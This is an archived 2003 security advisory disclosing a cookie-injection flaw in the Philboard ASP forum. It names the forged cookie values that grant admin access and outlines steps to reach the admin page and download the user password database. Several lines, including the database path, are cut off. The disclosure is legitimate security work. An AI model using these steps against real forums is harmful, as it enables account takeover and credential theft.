Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email firstname.lastname@example.org
Philboard Forum Vulnerability
Date: Thu May 29 2003 - 03:48:45 CDT
Severity : High (Possible gain administrator/users access on Forum Board)
Systems Affected: Philboard up to v1.14
Vendor URL: http://www.youngpip.com/philboard.asp
Vuln Type : Cookie Injection
Status : Vendor contacted, fixed version is not available (cause they didn't
Author : AresU
Greetz to : Bosen, Tioeuy, syzwz, Heltz, eF73, SakitJiwa, gembule, muthafuka,
and All 1ndonesian Security Team (1st)
Philboard is freeware forum application under ASP Scripts.
Vulnerable script is on cookie management, all most script is vulnerable for
cookie injection. The cookies are "philboard_admin=True;" or "admin=True;"
Vulnerability discovery and advisory by AresU
Vendor has contacted and fixed version is not available (cause they didn't
To Fix the script, you must change every cookie command in to session command.
1) Login Administrator Forum:
Use your telnet and open target on port 80
GET /board/philboard_admin.asp HTTP/1.0
2) Download the database (users and password):
Usually, the database location can be found and download it from:
This mail sent through http://webmail.bosen.net